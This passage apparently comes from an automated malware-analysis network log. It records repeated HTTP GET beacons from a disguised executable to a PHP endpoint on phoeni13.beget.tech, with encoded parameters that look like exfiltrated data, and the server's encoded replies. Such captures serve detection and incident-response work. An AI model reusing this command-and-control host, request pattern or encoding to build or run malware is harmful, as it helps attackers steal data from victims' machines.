3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJpXTq9UeBp2T4FkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:58:16.894395113 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49915	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:21.916296005 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJdXQq9kMNp2T4lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:58:22.625699043 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49953	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:27.635389090 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJRTQq9kMJp2TyUkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:58:28.406780958 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49989	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:33.416500092 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJhXUq9UMNp2T3lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:58:34.156667948 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50025	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:39.167292118 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJFTVq9EMRp2T5VkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:58:39.907494068 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50026	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:44.919692993 CET	2854	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=0VfiIiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYisHL9JSOx4WSyEkaPpXSq9ENBpWS2kUaaJzY65EMnRlW4VleOFTTq5kaOR1TxUVbZtmSX1EMZR0TrRGRPhGZEpFaKdVWpZ0Va1mUy0Ua3lWSsFkeNl2bqlUNBRVTysmaZlXREpFaapnTzkEVNVTUU1EMRR [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:58:45.674732924 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50027	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:50.686085939 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJNTSq9keRp2T0UkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:58:51.476763010 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50028	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:58:56.494642019 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJNTRq9kMRp2T6VkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:58:57.233858109 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:58:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50029	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:02.995815992 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJNTUq90MVp2T3VkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:59:03.831329107 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: 